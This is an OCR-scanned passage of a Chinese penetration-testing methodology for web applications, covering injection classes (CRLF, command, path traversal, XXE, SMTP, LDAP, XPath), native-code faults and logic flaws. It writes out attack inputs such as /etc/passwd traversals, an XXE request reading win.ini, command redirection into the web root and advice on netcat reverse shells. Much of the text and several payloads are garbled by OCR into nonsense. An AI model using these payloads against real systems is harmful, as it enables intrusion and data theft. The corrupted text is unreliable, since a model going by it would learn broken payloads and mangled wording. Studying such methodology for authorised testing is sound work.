是 否 接受 URL 编 码 的 回 车 〈%0d) 与 换行 (%0a) 符 ， 以 及 它们 是 否 
按 原 样 在 啊 应 中 返回 。 请 注意 ， 在 服务 恬 的 啊 应 中 寻找 的 是 换行 符 本 
吴 ， 而 不 是 它们 的 UREL 编 码 形 式 。 

(2) 如 果 在 提交 专门 设计 的 输入 后 ， 服 务 器 的 响应 消息 头 新 增 了 
一 行 ， 那 么 应 用 程序 易 受 HTTP 消 息 头 注入 攻击 。 如 第 13 章 所 述 ， 攻 击 
者 可 以 利用 这 种 漏洞 实施 各 种 攻击 。 

(3) 如 果 服 务 器 的 响应 中 仅 返回 两 个 换行 符 中 的 一 个 ， 根 据 实际 
情况 ， 仍 可 以 设计 出 有 殖 的 攻击 方法 。 

(4) 如 果 发 现 应 用 程序 阻止 包含 换行 符 的 输入 ， 或 者 净化 出 现在 
啊 应 中 的 这 些 字 符 ， 和 莹 试 使 用 下 面 的 输入 测试 过 滤 的 效率 : 


foos00s0ds0abar 
£00%250d%250abar 
foostt0d0dss0a0abar 


4. 测试 任意 重 定向 


(1) 如果 反 射 型 输入 用 于 指定 某 类 重 定向 的 目标 ， 测 试 是 否 可 以 
提交 专门 设计 的 输入 ， 生 成 指向 一 个 外 部 Web 站 点 的 任意 重 定 向 。 如 
果 可 以 ， 渗 透 测 试 员 就 可 以 利用 这 种 行为 提高 钓鱼 攻击 的 可 信和 度 。 

(2) 如 果 应 用 程序 以 参数 值 的 形式 传送 绝对 URL， 那 么 修改 URL 
中 的 域名 ， 测 试 应 用 程序 是 否 重 定向 到 不 同 的 域 。 

(3) 如 果 参 数 中 包含 一 个 相对 URL， 将 这 个 URL 修 改 成 指向 另 一 
个 域 的 绝对 URL， 并 测试 应 用 程序 是 否 重 定向 到 这 个 域 。 

(4) 如果 应 用 程序 为 防止 外 部 重 定 向 ， 在 进行 重 定向 前 对 参数 进 
行 某 种 形式 的 确认 ， 通 常 仍然 可 以 轻易 避 开 这 种 确认 。 尝试 使 用 第 13 
章 描述 的 各 种 攻击 测试 过 滤 的 效率 。 

5. 测试 保存 型 攻击 

(1) 如 果 应 用 程序 保存 用 户 提交 的 输入 ， 并 随后 在 屏幕 上 显示 这 
些 输入 ， 那 么 ， 在 模糊 测试 整个 应 用 程序 后 ， 可 能 会 发 现 攻 击 字符 串 
在 本 身 并 未 包含 这 些 字 符 串 的 请 求 的 响应 中 返回 。 留 意 这 种 情况 ， 确 
定 被 保存 数据 的 原始 进入 点 。 

(2) 有 时 ， 只 有 完成 一 个 多 阶段 过 程 ， 用 户 提 交 的 数据 才 被 成 功 
保存 。 如 果 在 应 用 程序 解析 过 程 中 确定 这 种 功能 ， 那 么 手动 完成 相关 
过 程 ， 并 在 被 保存 的 数据 中 查找 XSS 漏 洞 。 

(3) 如 果 拥 有 足够 的 访问 权限 ， 应 仔细 审查 可 在 更 高 权限 的 用 户 
会 话 中 显示 低 权 限 用 户 的 数据 管理 功能 。 管 理 功 能 中 存在 的 任何 保存 
型 XSS 漏 洞 往往 会 直接 导致 权限 提升 。 

(4) 测试 用 户 提交 的 数据 被 保存 且 向 该 用 户 显示 的 每 一 种 情况 。 
测试 这 些 情 况 ， 从 中 查找 上 述 XSS 和 其 他 响应 注入 漏洞 。 

(5) 如 果 发 现 一 个 漏洞 将 一 名 用 户 提交 的 输入 显示 给 其 他 用 户 ， 
渗透 测试 员 要 确定 可 用 于 实现 目标 的 最 佳 攻 击 有 效 载荷 ， 如 会 话 劫持 
或 请 求 伪 造 。 如 果 被 保存 的 数据 仅 向 提交 该 数据 的 用 户 显 示 ， 那 么 设 
法 找 出 办 法 ， 链 接 已 经 发 现 的 所 有 漏洞 〈 如 不 完善 的 访问 控制 ) ， 从 
而 在 其 他 用 户 的 会 话 中 注入 一 个 攻击 。 

(6) 如 果 应 用 程序 允许 文件 上 传 与 下 载 ， 应 始终 探查 这 种 功能 是 
否 易于 受到 保存 型 XSS 攻 击 。 如 果 应 用 程序 允许 HTML. JAR 或 文本 文 
件 ， 且 并 不 确认 或 净化 它们 的 内 容 ， 那 么 几乎 可 以 肯定 它们 易于 受到 
攻击 。 如 果 它 允许 JPEG 文 件 且 并 不 确认 其 中 是 否 包含 有 效 的 图 像 ， 那 
么 它 可 能 易于 受到 针对 Internet Explorer 用 户 的 攻击 。 测 试 应 用 程序 如 
何 处 理 它 支持 的 每 种 文件 类 型 ， 并 弄 清 浏览 器 如 何 处 理 包 含 HTML 而 
非 正 常 内 容 的 响应 。 


(7) 在 一 名 用 户 提交 的 数据 被 显示 给 其 他 用 户 的 每 一 个 位 置 ， 如 
果 应 用 程序 实施 的 过 滤 阻 止 发 动 保存 型 XSS 攻 击 ， 确 定 应 用 程序 的 行 
为 是 否 使 它 易 于 受到 本 站 点 请 求 伪造 攻击 。 


21.7.4 ”测试 OS 命令 注入 


(1) 如 果 在 21.7.1 节 第 3 步 中 列 出 的 任何 命令 注入 攻击 字符 串 导 致 
应 用 程序 在 做 出 啊 应 时 出 现 反 党 的 时 间 延 迟 ， 那 么 应 用 程序 易于 受到 
OS 命令 注入 攻击 。 手 动 重复 进行 测试 ， 在 -i 或 -n 参 数 中 指定 不 同 的 
值 ， 确 定 啊 应 时 间 是 否 随 着 这 个 值 而 发 生 系 统 性 的 变化 。 

(2) 使 用 所 发 现 的 任何 一 个 可 成 功 实 施 攻击 的 注入 字符 串 ， 演 试 
注入 男 一 个 更 加 有 用 的 命令 (如 1]s 或 dir) ， 确 定 是 否 能 够 将 命令 结果 
WEF has lk ° 

(3) 如 果 不 能 直接 获得 命令 执行 结果 ， 还 可 以 采用 其 他 方法 。 

口 可 以 尝试 打开 一 条 通 回 目 己 计算 机 的 带 外 通道 。 尝 试 
使 用 TFTP 上 传 工 具 至 服务 器 ， 使 用 telnet 或 netcat 建 立 一 个 通 
回 自 己 计算 机 的 反 回 shell， 并 使 用 mail 命 令 通过 SMTP 发 送 命 
令 结 果 。 

oy 可 以 将 命令 结果 重 定 癌 到 Web 根 目录 下 的 一 个 文件 ， 
然后 使 用 自己 的 浏 贤 器 直接 获取 结果 。 例 如 : 


dir > c:\inetpub\wwwroot\foo.txt 


(4) 一 旦 找到 注入 命令 的 方法 并 能 够 获得 命令 执行 结果 ， 就 应 当 
确定 自己 的 权限 (通过 使 用 whoami 或 类 似 命令 ， 或 者 尝试 向 一 个 受 保 
护 的 目录 写 入 一 个 无 害 文件 ) 。 然 后 就 可 以 设法 提升 目 己 的 权限 ， 进 
T a 
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(5) 如 果 知 道 自己 的 输入 被 提交 给 某 个 OS 命令 ,但 提交 前 面 列 
出 的 攻击 字符 串 无 法 成 功 实施 攻击 ， 那 么 观察 是 否 可 以 使 用 < 或 > 字符 
将 一 个 文件 的 内 容 指 疝 命令 的 输入 ， 或 者 将 命令 的 输出 指 同 一 个 文 
件 。 可 以 使 用 这 种 方法 读 取 或 写 入 任意 文件 的 内 容 。 如 采 知 道 或 能 够 
猜测 出 被 执行 的 命令 ， 党 试 注入 与 该 命令 有 关 的 命令 行 参数 ， 以 有 利 
的 方式 修改 它 的 行为 例如， 指定 Web 根 目录 中 的 输入 文件 ) 。 

(6) 如 采 发 现 应 用 程序 对 实施 命令 注入 所 需 的 某 些 字符 进行 转 
义 ， 可 笑 试 在 这 些 字 符 串 中 插入 转 义 字符 。 如 采 应 用 程序 并 不 对 转 义 


字符 本 吴 进 行 转 义 ， 束 可 以 利用 这 种 行为 避 开 应 用 程序 的 防御 机 制 。 
日 符 被 阻止 或 净化 ， 束 可 以 使 用 $IFS 蔡 代 在 UNIX 平 台中 出 
现 的 空格 。 


21.7.5 WAH 


(1) 对 于 执行 的 每 次 模糊 测试 ， 检 查 在 21.7.1 节 第 3 步 中 列 出 的 路 
径 抽 历 攻击 字符 串 生 成 的 结果 。 可 以 在 Burp Intruder 中 单 击 有 效 载 集 列 
的 顶部 ， 按 有 效 载 和 荷 对 结果 表 进 行 分 类 ， 从 而 将 这 些 字 符 串 生成 的 结 
果 分 组 。 如 果 收 到 一 个 不 常见 的 错误 消息 ， 或 者 长 度 不 正常 的 啊 应 ， 
手动 检查 啊 应 ， 确 定 其 中 是 否 包含 特定 文件 的 内 容 或 其 他 表示 执行 了 
反常 文件 操作 的 证 据 。 

(2) 在 解析 应 用 程序 的 受 攻 击 面 的 过 程 中 ， 应 该 已 经 注意 到 了 一 
些 专用 的 功能 ， 使 用 它们 可 根据 用 户 提交 的 输入 读 取 和 写 入 文件 。 除 
了 对 所 有 参数 进行 模糊 测试 外 ， 还 应 极其 仔细 地 手动 测试 这 项 功能 ， 
确定 所 有 路 径 所 历 漏洞 。 

(3) 如 果 某 个 参数 中 包含 一 个 文件 名 、 文 件 名 的 一 部 分 或 一 个 目 
录 ， 修 改 这 个 参数 的 值 ， 并 在 其 中 插入 任意 一 个 子 目 录 和 一 个 遍历 序 
列 。 例 如 ， 如 果 应 用 程序 提交 参数 : 


file=foo/filel.txt 


那么 可 以 答 试 提交 以 下 值 : 


file=foo/bar/../filel.txt 


如 采 两 种 情况 下 应 用 程序 的 行为 完全 相同 ， 那 么 它 易于 受到 攻 
击 ， 渗 透 测 试 员 应 该 继续 以 下 步 又 。 如 有 果 在 上 述 两 种 情况 下 应 用 程序 
的 行为 有 所 不 同 ， 那 么 应 用 程序 可 能 阻止 、 删 除 或 净化 遍历 序列 ， 致 
使 文件 路 径 失 效 。 和 苍 试 使 用 第 10 章 描述 的 编码 与 其 他 攻击 避 开 过 滤 。 

(4) 如 果 前 面 在 基础 目录 中 使 用 遍历 序列 的 测试 取得 成 功 ， 演 试 
使 用 其 他 序列 上 漳 到 基础 目 示 ， 并 访问 服务 器 操作 系统 中 的 已 知 文 
件 。 如 有 果 这 些 笑 试 失败 ， 应 用 程序 可 能 在 许可 文件 访问 前 实施 了 各 种 
过 滤 或 检查 ， 应 当 进 行 深入 分 析 ， 了 解 应 用 程序 实施 的 控制 以 及 是 否 
可 以 避 开 这 些 控制 。 

(5) 应 用 程序 可 能 会 检查 被 请 求 的 文件 扩展 名 ， 只 人 允许 用 户 访问 
特殊 类 型 的 文件 。 竹 试 使 用 空 字 节 或 换行 符 攻 击 ， 并 在 后 面 连接 已 知 


的 、 应 用 程序 接受 的 文件 扩展 名 ， 设 法 避 开 过 滤 。 例 如 : 


OO 本末 

.-/../../../../etc/passwd%0a. jog 

(6) 应 用 程序 可 能 会 检查 用 户 提 交 的 文件 路 径 是 否 以 一 个 特定 的 
文件 名 或 词根 开头 。 党 试 将 遍历 序列 附加 在 一 个 已 知 应 用 程序 接受 的 
词根 后 面 ， 避 开 过 滤 。 例 如 ; 


/images/../../../../../../../etc/passwd 


(7) WUXI BO, SNS BEA SLEET, 
oxy eA H RATEM, TAEMA RP SA A Re EO 
何 处 理 无 法 预料 的 输入 。 

(8) 如 果 能 够 读 取 服务 器 上 的 任意 文件 ， 尝 试 获取 以 下 任何 一 个 
文件 ， 进 而 扩 天 攻击 范围 。 

口 操作 系统 与 应 用 程序 的 密码 文件 。 

口服 务 需 与 应 用 程序 配置 文件 ， 发 现 其 他 漏洞 或 优化 另 
攻击 

口 可 能 含有 数据 库 证 书 的 包含 文件 。 

口 应 用 程序 使 用 的 数据 源 ， 如 MySQL 数 据 库 文 件 或 XML 


口服 务 硕 可 执行 页 面 的 源 代 码 ， 以 执行 搜索 漏洞 的 代码 


口 可 能 包含 用 户 名 和 会 话 令 牌 的 应 用 程序 日 志文 件 等 。 
(9) 如 果 能 够 写 入 服务 器 上 的 任意 文件 ， 分 析 是 否 可 以 实施 以 下 
攻击 ， 进 而 扩大 攻击 范围 。 
口 在 用 户 的 局 动 文件 夹 中 创建 脚本 。 
口 当 用 户 下 一 次 连接 时 ， 修 改 in.ftpd 等 文件 执行 任意 命 


令 。 
口 在 一 个 拥有 执行 许可 的 Web 目 孙 中 写 入 脚本 ， 从 浏览 
an aA EM ° 


21.7.6 ”测试 脚本 注入 


(1) 对 于 执行 的 每 一 次 模糊 测试 ， 在 测试 结果 中 搜索 字符 串 
111111 本 身 ( 即 它 前 面 没 有 其 他 测试 字符 串 ) 。 在 Burp Intruder 中 ， 按 


A 


审查 


住 Shift 键 的 同时 单 击 111111 Grep 子 符 串 标题 ， 对 所 有 包含 这 个 字符 串 
的 结果 进行 分 类 ， 即 可 迅速 确定 这 些 字 符 串 。 确 定 的 任何 结 采 都 可 能 
易于 受到 脚本 命令 注入 攻击 。 

(2) 检查 使 用 脚本 注入 字符 串 的 所 有 测试 ， 确 定 所 有 包含 脚本 错 
翅 请 恩 的 测试 ， 这 些 错误 消 轧 表示 输入 被 执行 ， 但 造成 一 个 错误 ， 因 
而 可 能 需要 对 测试 进行 优化 ， 以 成 功 实施 脚本 注入 。 

(3) 如 果 应 用 程序 似乎 易于 受到 攻击 ， 通 过 注入 其 他 专门 针对 应 
用 程序 所 使 用 的 脚本 平台 的 命令 ， 确 认 漏 洞 是 否 存 在 。 例 如 ， 可 以 使 
用 类 似 于 模糊 测试 OS 命令 注入 时 使 用 的 攻击 有 效 载 傈 : 


system('ping%20127.0.0.1') 


21.7.7_ 测试 文件 包含 


(1) 如 果 在 模糊 测试 时 收 到 任何 由 目标 应 用 程序 的 基础 架构 提出 
的 HITP 连 接 ， 那 么 几乎 可 以 肯定 应 用 程序 易于 受到 远程 文件 包含 攻 
击 。 以 单线 程 的 方式 在 有 限 的 时 间 内 重复 相关 测试 ， 确 定 到 底 是 哪些 
参数 致使 应 用 程序 提出 HTTP 请 求 。 

(2) 检查 文件 包含 测试 结果 ， 确 定 在 应 用 程序 的 响应 中 造成 反常 
延迟 的 所 有 测试 。 在 这 些 情况 下 ， 可 能 应 用 程序 本 身 易于 受到 攻击 ， 
但 HTTP 请 求 可 能 因为 网 络 级 过 滤 而 超时 。 

(3) 如 果 发 现 一 个 远程 文件 包含 漏洞 ， 部 署 一 台 包 含 恶意 脚本 
(专门 针对 所 攻击 的 语言 而 编写 ) 的 web 服务 器 ， 使 用 和 测试 脚本 注 
入 类 似 的 命令 确定 脚本 是 否 被 执行 。 


除了 前 面 介绍 的 基于 输入 的 漏洞 外 ， 还 有 一 系列 漏洞 只 有 在 特殊 
功能 中 才 会 表现 出 来 。 在 实践 下 面 的 测试 步 又 之 前 ， 渗 透 测试 员 首 先 
应 当 对 应 用 程序 的 受 攻击 面 的 评估 结果 进行 4 分 析 ， 确定 可 能 出 现 这 些 
漏洞 的 应 用 程序 功能 ， 并 集中 精力 测试 这 些 功能 


应 用 程序 解析 结果 


图 21-9 测试 功能 方面 的 输入 漏洞 


21.8.1 测试 SMTP 注 入 


(1) 对 于 与 电子 邮件 有 关 的 功能 使 用 的 每 一 个 请 求 ， 轮 流 提 交 以 
下 每 个 测试 字符 串 作为 每 一 个 参数 ， a ae 
址 。 如 步骤 21.7.1 所 述 ， 可 以 使 用 Burp Intruder 目 动 完成 这 项 任务 
些 测试 字符 串 已 经 将 特殊 的 字符 进行 了 URL 编 码 ， 因 此 不 THENE 
们 进行 编码 。 


<youremail>$ ate: <youremai.> 

<ycouremyil>tuatdate : <yourenai -> 

<youremeil>?iabee :<youremai -> 

<yourcmail>$06%0aBee:<yourcma__> 

S$USDATAS 0a Loot JatZe JAMA L+PROM: +<youremail>sCaRCoT+70:+<youremal > 
SIJAA Izl rom: +<yourenai _>SJavto:+<yourenalil>tuaSubjecc:+cesctialoe 
$0atZ2o%u0a 


$903 9e5ATAS9IS% 0a [Oot Jit Jat Zet 06% IJ aMA I L+FRCM: —<yourcnal _>¢IStIaRC oT 


TOs 1 
<yourems i 1>89S%9anATALISSIaPFron: | <youremai 1>£CS3Iao: 1 <yourema’ > 
RAS sfudi ecu:  test#ISRIa*ooFISBIaSA~SRISSCa| 


(2) 检查 测试 结果 ， 确 定 应 用 程序 返回 的 所 有 错误 消息 。 如 果 这 
T 
| 用 漏洞 。 

(3) 应 该 监控 指定 的 电子 邮件 地 址 ， 看 是 否 收 到 任何 电子 邮件 。 

(4) 仔细 检查 生成 相关 请 求 的 HIML 表 单 。 它 们 可 能 提供 与 服务 
堪 端 软件 有 关 的 线索 。 其 中 可 能 包含 一 个 用 于 指定 电子 邮件 收 件 人 
(To) 地 址 的 隐藏 或 禁用 字段 ， 可 以 直接 对 其 进行 修改 。 


21.8.2 ”测试 本 地 代码 漏洞 


1. 测试 缓冲 区 溢出 

(1) 向 每 一 个 目标 数据 提交 一 系列 稍 大 于 常用 缓冲 区 大 小 的 长 字 
和 从 串 。 一 次 针对 一 个 数据 实施 攻击 ， 最 大 程度 地 者 盖 应 用 程序 中 的 所 
有 代码 路 径 。 可 以 使 用 Burp Intruder 中 的 字符 块 有 效 载 答 来 源 自 动 生成 
各 种 大 小 的 有 效 载 集 。 可 以 对 下 面 的 绥 冲 区 大 小 进行 测试 : 

1100 


4200 
33000 


(2) 监控 应 用 程序 的 响应 ， 确 定 所 有 反常 现象 。 任 何 无 法 控制 的 
次 出 几乎 可 以 肯定 会 在 应 用 程序 中 造成 异常 ， 虽 然 远 程 诊 断 问 题 的 本 
fac FY BAP Fs AME o FERIA PCR o 


J HTTP 500 状 态 码 或 错误 消息 ， 这 时 其 他 畸形 (而 非 超 
K) 输入 不 会 产生 相同 的 结果 。 
口内 容 详细 的 消息 ， 表 示 某 个 外 部 本 地 代码 组 件 发 生 故 


口服 务 絮 收 到 一 个 局 部 或 畸形 响应 。 
口服 务 器 的 TCP 连 接 未 返回 啊 应 ， 突 然 关 闭 。 
口 整个 web 应 用 程序 停止 啊 应 。 
口 应 用 程序 返回 出 人 意料 的 数据 ， 表 示 内 存 中 的 一 个 字 
符 串 可 能 < 丢失 ”了 它 的 空 终 止 符 。 
2. 测试 整数 漏洞 

(1) 当 测 试 本 地 代码 组 件 时 ， 确 定 所 有 基于 整数 的 数据 ， 特 别 是 
长 度 指示 符 ， 可 以 利用 它 触 发 整数 漏洞 。 

(2) 向 每 一 个 目标 数据 提交 由 在 触发 漏洞 的 适当 有 效 载 傈 。 轮 流 
回 每 一 个 目标 数据 发 送 一 系列 不 同 的 值 ， 分 别 表 示 不 同 大 小 的 有 符号 
与 无 符号 整数 值 的 边界 情况 ， 如 下 所 示 。 
g 0x7f50x80 (1275128) 
口 0xff 与 0x100 (2555256) 
口 0x7ffff 与 0x8000 (32 767 与 32 768) 
口 0xffff 与 0x10000 (65 535 与 65 536) 
口 Ox7fffffff 与 0x80000000 (2 147 483 647 与 2 147 483 


648) 


口 Oxffffffff 与 0x0 (4294 967 29550) 

(3) 当 被 修改 的 数据 以 十 六 进 制 表示 时 ， 应 该 发 送 每 个 测试 字符 
捉 的 little-endian 人 与 big-endian 版 本 ， 例 如 ，ff7f 以 及 7fff。 如 有 果 十 六 进 制 
数字 以 ASCII 形 式 提交 ， 应 该 使 用 应 用 程序 自身 使 用 的 字母 字符 ， 确 
保 这 些 字符 被 正确 编码 。 

(4) 如 21.8.2 节 第 1 步 的 (2) 所 述 ， 监 探 应 用 程序 的 响应 ， 查 找 
所 有 反常 事件 。 

3. 测试 格式 化 字符 串 漏 洞 
ge 轮流 向 每 一 个 参数 提交 包含 一 长 串 不 同 格式 说 明 符 的 字符 
S yil H: 


SnSnFSnFnsnFsnsnsnFsnsn$nsnsnSnsnsnsnsntnFn 
SetsSstststststssststststs$stststststssse 
Siin!S2ini' Se iniS4in! SS intS6ln!S7in'S8iniS9in!'Bio!in! etc... 


SLIS!B2!s!S3IsiF4islS5islhF6lslS7TIst$8islF$9isi#id!is! etc... 


记得 将 % 字 符 URL 编 码 成 %25 。 
(2) 如 21.8.2 节 第 1 步 的 (2) 所 述 ， 监 探 应 用 程序 的 响应 ， 查 找 
所 有 反常 事件 。 


21.8.3 ”测试 SOAP 注 入 


(1) 轮流 测试 怀疑 通过 SOAP 消 息 处 理 的 参数 。 提 交 一 个 恶意 
XML 结 束 标签 ， 如 </foo>。 没 有 发 生 错误 就 表示 该 输入 可 能 没有 插入 
SOAP 消 息 中 ， 或 者 以 某 种 方式 被 净化 。 

(2) 出 现 错误 就 提交 一 对 有 效 的 起 始 与 结束 标签 ， 如 <foo> 
</foo>。 如 果 这 对 标签 使 错误 消失 ， 应 用 程序 很 可 能 易于 受到 攻击 。 

(3) 如 果 提 交 的 攻击 字符 串 在 应 用 程序 的 响应 中 原样 返回 ， 轮 流 
提交 下 面 两 个 值 。 如 果 发 现 其 中 一 个 值 的 返回 结果 为 另 一 个 值 ， 或 者 
只 是 返回 test， 那 么 可 以 确信 该 输入 被 插入 到 了 XML 消息 中 。 


ZN 


test<foo/> 
test<foo></foo> 


(4) 如 果 HTTP 请 求 中 包含 几 个 可 放 入 SOAP 消 息 中 的 参数 ， 党 
试 在 一 个 参数 中 插入 起 始 注释 字符 <!--， 在 另 一 个 参数 中 插入 结束 注 
释 字 符 !-->。 然 后 ， 轮 换 在 参数 中 插入 这 两 个 字符 (因为 无 法 知道 参 
数 出 现 的 顺序 ) 。 这 样 做 可 能 会 把 服务 器 SOAP 消 息 的 某 个 部 分 作为 
注释 处 理 ， 从 而 改变 应 用 程序 的 逻辑 ， 或 者 形成 一 个 可 能 造成 信息 泄 
露 的 错误 条 件 © 


21.8.4 测试 LDAP 注 入 

(1) 在 任何 使 用 用 户 提 交 的 数据 从 一 个 目录 服务 中 获取 信息 的 功 
能 中 ， 针 对 每 一 个 参数 ， 轮 流 测试 是 否 可 以 注入 LDAP 查 询 。 
(2) 提交 * 字 符 。 返 回 大 量 结果 就 明确 表示 针对 的 是 LDAP 查 
mj ° 

(3) 党 试 输入 大 量 闭 括号 : 

P79 FE 2 


这 个 输入 会 使 查询 语法 失效 ， 因 此 ， 如 采 它 导致 错误 或 其 他 反 香 
行为 ， 那 么 应 用 程序 易于 受到 攻击 (许多 其 他 应 用 程序 功能 和 注入 情 
况 也 会 造成 相同 的 结果 ) 。 

(4) 尝试 输入 干扰 不 同 查 询 的 各 种 表达 式 ， 看 是 否 影响 返回 的 结 
果 。 在 查询 目录 未 知 的 情况 下 cn 非常 有 用 ， 因 为 所 有 的 LDAP 实 现 都 
文 全 这 个 属性 


) (cn=* 
*)) (| (cn=* 


*)})300 

(5) 尝试 在 输入 结尾 增加 其 他 属性 ， 并 用 逗号 分 隔 这 些 属性 。 轮 
流 测 试 每 一 个 属性 ， 返 回 错误 消息 就 表示 该 属性 当前 无 效 。 以 下 属性 
常用 在 由 LDAP 查 询 的 目录 中 : 


mail 

givenname 

© 

ou 

de 
T 
uid 
objectclass 
postaladdress 
dn 


sn 


21.8.5 ”测试 XPath 注入 


并 确定 它们 是 否 会 使 应 用 程序 的 行为 发 
生 改 变 ， 但 不 会 造成 错误 : 


' or count (parent::*[position()=1])=0 or ‘a' 
' or count (parent::*[position()=1])>0 or va 


o 


(2) 如 果 参 数 为 数 子 ， 尝 试 提交 下 面 的 测试 字符 串 : 


1 or count (parent::*[position(}=1]}=0 
1 or count (parent::*[position({})=1])>0 


(3) 如 果 上 面 的 任何 字符 串 导 致 应 用 程序 的 行为 发 生 改 变 ， 但 不 
会 造成 错误 ， 很 可 能 可 以 通过 设计 测试 条 件 ， 一 次 提取 一 字 市 的 信 
思 ， 从 而 获取 任意 数据 。 使 用 一 系列 以 下 格式 的 条 件 确定 当前 节点 的 
父 市 点 的 名 称 : 


substring (name (parent: :*[position{)=1]),1,1})='a' 
(4) 提取 出 父 节 点 的 名 称 后 ， 使 用 一 系列 下 列 格式 的 条 件 提取 
XML 树 中 的 所 有 数据 。 


substring (//parentnodename [position({)=1]/child::node() [position{)=1] 
/text(),1,1)="‘a' 


21.8.6_ 测 试 后 端 请 求 注入 


(1) 确定 在 参数 中 指定 内 部 服务 器 名 称 或 了 地址 的 任何 情况 。 提 
区 任意 服务 如 和 端口 ， 监 视 应 用 程序 是 否 出 现 超 时 。 还 可 以 提交 
localhost， 然 后 提交 目 己 的 IP 地 址 ， 之 后 在 指定 端口 上 监视 传 入 连接 。 

(2) 针对 根据 特定 值 返回 特定 页 面 的 请 求 参 数 ， 尝 试 使 用 以 下 各 
种 语法 附加 新 的 注入 参数 : 

$26foos3dbar ( URL 编码 的 &foo=bar ) 

$3bfoo%3dbar ( URL 编码 的 ,foo0=bar ) 

$2526fo008253dbar ( 双人 童 URL 编 码 的 &foo=bar ) 

如 果 应 用 程序 的 行为 与 未 修改 原始 参数 时 相同 ， 说 明 其 中 可 能 存 

在 HITP 参 数 注 入 漏洞 。 这 时 ， 可 通过 注入 可 能 更 改 后 端 逻辑 的 已 知 参 
数 的 名 / 值 对 来 攻击 后 端 请 求 (如 第 10 间 所 壕 ) 


21.8.7 测试 XXFE 注 入 
如 果 用 户 正 向 服务 器 提交 XML， 则 可 以 实施 外 部 实体 注入 攻击 。 


ee 可 以 笑 试 指定 一 个 外 部 实体 ， 如 下 
所 示 : 


POST /search/128/AjaxSearch.ashx HTTP/1.1 
Host: mdsec.net 

Content-Type: text/xml; charset=UTF-8 
Content-Length: 115 


<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///windows/win.ini"® > ]> 


<Search><SearchTerm>&xxe; </SearchTerm></Search> 
如 果 找 不 到 已 知 字段 ， 可 以 将 “http:/192.168.1.1:25” 指 定 为 外 部 实 
体 ， 并 监视 页 面 啊 应 时 间 。 如 采 页 面 啊 应 的 时 间 明 品 增 长 或 页 面 超 
时 ， 则 说 明 应 用 程序 易于 受到 攻击 。 


` 


21.9 k 


21.9.1 确定 关键 的 受 攻击 面 


21.9.2 测试 上 |21.9.3 不 完 [21.9.4 MKF |21.9.5 测试 
多 阶段 过 程 | | 整 的 输入 | 信任 边界 f | 交易 逻辑 


图 21-10 ”测试 逻辑 缺陷 


21.9.1 确定 关键 的 受 攻 击 面 


(1) 逻辑 缺陷 的 形式 多 种 多 样 ， 并 且 可 能 存在 于 应 用 程序 功能 的 
每 一 方面 。 为 确保 探查 逻辑 缺陷 的 效率 ， 首 先 应 该 将 受 攻 击 面 缩小 到 
一 个 适当 的 范围 ， 以 方便 手动 测试 。 
(2) 检查 应 用 程序 解析 过 程 中 获得 的 结果 ， 确 定 以 下 情况 。 
口 多 阶段 过 程 。 
口 重要 的 安全 功能 ， 如 登录 。 
口 信任 边界 的 转换 (例如 ， 登 录 时 由 匿名 用 户 转 变 为 自 
我 注册 用 户 ) 。 
口 检查 和 调整 交易 价格 或 数量 。 


21.9.2 测试 多 阶段 过 程 
(1) 如 果 一 个 多 阶段 过 程 需要 按 预 定 的 顺序 提交 一 系列 请 求 ， 尝 


试 按 其 他 顺序 提交 这 些 请 求 。 尝 试 完全 省 略 某 些 阶段 ， 几 次 访问 同一 
个 阶段 ， 或 者 推 后 访问 前 一 个 阶段 。 


(2) 这 些 阶 段 可 能 通过 一 系列 指向 特殊 URL 的 GET 或 POST 请 求 
进行 访问 ， 或 者 需要 向 同一 个 URL 提 交 不 同 的 参数 。 被 访问 的 阶段 可 
通过 在 被 请 求 的 参数 中 提交 功能 名 称 或 索引 来 指定 。 确 保 完 全 了 解 应 
用 程序 访问 不 同 阶段 所 使 用 的 机 制 。 

(3) 除了 打 乱 操作 步 又 的 顺序 外 ， 党 试 提取 在 一 个 过 程 阶段 提交 
的 参数 ， 并 在 另 一 个 阶段 提交 这 些 参数 。 如 果 相 关 数 据 被 应 用 程序 更 
新 ， 应 当 确 定 是 否 可 以 利用 这 种 行为 破坏 应 用 程序 的 逻辑 。 

(4) 如 果 在 一 个 多 阶段 过 程 中 ， 不 同 的 用 户 对 同一 组 数据 进行 操 
作 ， 提 取 某 一 名 用 户 提 交 的 每 一 个 参数 ， 再 由 另 一 名 用 户 提 交 这 些 参 
数 。 如 果 应 用 程序 接受 并 处 理 这 些 参数 ， 如 前 面 所 述 ， 探 索 这 种 行为 
的 衍生 效果 。 

(5) 根据 执行 功能 的 情形 ， 了 解 开 发 者 做 出 的 假设 以 及 主要 受 攻 
ee 
y y o 

(6) 如 果 不 按 顺序 访问 多 阶段 功能 ， 应 用 程序 常常 表现 出 一 系列 
异常 现象 ， 如 变量 值 为 空 字符 或 未 被 初始 化 ， 状 态 仅 部 分 定义 或 相互 
矛盾 ， 以 及 其 他 无 法 预料 的 行为 。 寻 找 有 用 的 错误 消息 和 调试 结果 ， 
可 以 通过 它们 进一步 了 解 该 功能 的 内 部 机 制 ， 从 而 调整 当前 攻击 ， 或 
者 发 动 另 一 次 攻击 。 


21.9.3 ”测试 不 完整 的 输入 


(1) 应 用 程序 的 重要 安全 功能 需要 处理 大 量 用 户 提交 的 输入 ， 并 
根据 这 些 输入 做 出 决策 。 因 此 ， 应 测试 这 些 功能 对 不 完整 输入 的 适应 
性 。 

(2) 轮流 测试 每 一 个 参数 ， 从 请 求 中 删除 参数 的 名 称 与 值 。 监 控 
应 用 程序 的 啊 应 ， 查 找 所 有 行为 异常 或 错误 消息 ， 它 们 可 能 提供 与 应 
用 程序 逻辑 有 关 的 信息 。 

(3) 如 采 所 操纵 的 请 求 属于 一 个 多 阶段 过 程 ， 应 测试 整个 过 程 ， 
和 
阶段 处 理 。 


21.9.4_ 测 试 信任 边界 


(1) 了 解 应 用 程序 如 何 处 理 不 同 用 户 信任 状态 之 间 的 转换 。 寻 找 
功能 ， 帮 助 一 名 拥有 符 定 信任 地 位 的 用 户 累积 一 定量 与 其 身份 有 关 的 


状态 ， 例 如 ， 匿 名 用 户 在 目 我 注册 过 程 中 提供 个 人 信息 ， 或 者 完成 于 
在 确认 其 身份 的 账户 恢复 过 程 。 

(2) 寻找 办 法 ， 通 过 在 一 个 区 域 积累 相关 状态 ， 在 信任 边界 之 间 
进行 不 恰当 的 转换 ， 然 后 以 正常 不 个 允 许 的 方式 切换 到 男 一 个 区 域 。 
例如 ， 完 成 部 分 账户 恢复 过 程 后 ， 壬 试 切 换 到 与 某 一 名 用 户 有 关 的 通 
